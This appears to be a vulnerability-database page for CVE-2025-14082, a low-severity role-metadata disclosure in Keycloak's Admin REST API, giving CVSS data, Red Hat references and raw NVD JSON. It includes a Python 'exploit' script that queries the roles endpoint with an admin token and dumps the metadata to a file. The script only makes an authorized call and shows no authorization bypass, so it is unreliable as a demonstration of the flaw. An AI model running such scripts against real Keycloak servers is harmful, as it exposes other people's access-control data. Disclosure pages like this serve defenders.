Security Vulnerability Report
CVE-2025-14082 CVSS 2.7 LOW

CVE-2025-14082

Published: 2025-12-10 09:15:47
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in Keycloak Admin REST (Representational State Transfer) API. This vulnerability allows information disclosure of sensitive role metadata via insufficient authorization checks on the /admin/realms/{realm}/roles endpoint.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak Admin REST API (all versions prior to vendor patch)
Red Hat Single Sign-On (affected versions per RHSA-2026:6477 and RHSA-2026:6478)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

import requests

# CVE-2025-14082 PoC - Keycloak Admin REST API Information Disclosure
# Description: Insufficient authorization checks on /admin/realms/{realm}/roles endpoint
# allows disclosure of sensitive role metadata


def exploit_cve_2025_14082(keycloak_url, realm, access_token):
    """
    Exploit for CVE-2025-14082: Keycloak Admin REST API role metadata disclosure

    Args:
        keycloak_url: Base URL of Keycloak server (e.g., https://keycloak.example.com)
        realm: Target realm name
        access_token: Valid access token with admin privileges

    Returns:
        JSON response containing role metadata, or None on failure
    """
    headers = {
        'Authorization': f'Bearer {access_token}',
        'Content-Type': 'application/json'
    }

    # Vulnerable endpoint - /admin/realms/{realm}/roles
    # (strip a trailing slash from the base URL so the path is not doubled)
    url = f"{keycloak_url.rstrip('/')}/admin/realms/{realm}/roles"

    print(f"[*] Target: {url}")
    print(f"[*] Realm: {realm}")
    print("[*] Attempting to retrieve sensitive role metadata...")

    try:
        response = requests.get(url, headers=headers, timeout=30)

        if response.status_code == 200:
            roles = response.json()
            print(f"[!] SUCCESS: Retrieved {len(roles)} role entries")
            print("[*] Sample role metadata:")
            # Display sensitive metadata that should not be accessible
            for role in roles[:5]:  # Show first 5 roles
                print(f"  - Role: {role.get('name', 'N/A')}")
                print(f"    Description: {role.get('description', 'N/A')}")
                print(f"    Attributes: {role.get('attributes', {})}")
            return roles
        elif response.status_code == 401:
            print("[-] FAILED: Unauthorized - Invalid or expired token")
        elif response.status_code == 403:
            print("[-] FAILED: Forbidden - Insufficient permissions")
        else:
            print(f"[-] FAILED: HTTP {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {str(e)}")

    return None


# Example usage
if __name__ == "__main__":
    # Configuration
    KEYCLOAK_URL = "https://keycloak.example.com"
    REALM = "master"
    ACCESS_TOKEN = "your-admin-access-token-here"

    # Execute exploit
    result = exploit_cve_2025_14082(KEYCLOAK_URL, REALM, ACCESS_TOKEN)

    if result:
        print("\n[*] Exploit completed - sensitive metadata retrieved")
        # Save full response for analysis
        with open('role_metadata_dump.json', 'w') as f:
            json.dump(result, f, indent=2)
        print("[*] Full data saved to role_metadata_dump.json")
```

References

https://access.redhat.com/errata/RHSA-2026:6477
https://access.redhat.com/errata/RHSA-2026:6478
https://access.redhat.com/security/cve/CVE-2025-14082
https://bugzilla.redhat.com/show_bug.cgi?id=2419078

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14082",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-10T09:15:46.857",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak Admin REST (Representational State Transfer) API. This vulnerability allows information disclosure of sensitive role metadata via insufficient authorization checks on the /admin/realms/{realm}/roles endpoint."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 2.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:6477",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:6478",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/security/cve/CVE-2025-14082",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419078",
        "source": "[email protected]"
      }
    ]
  }
}
```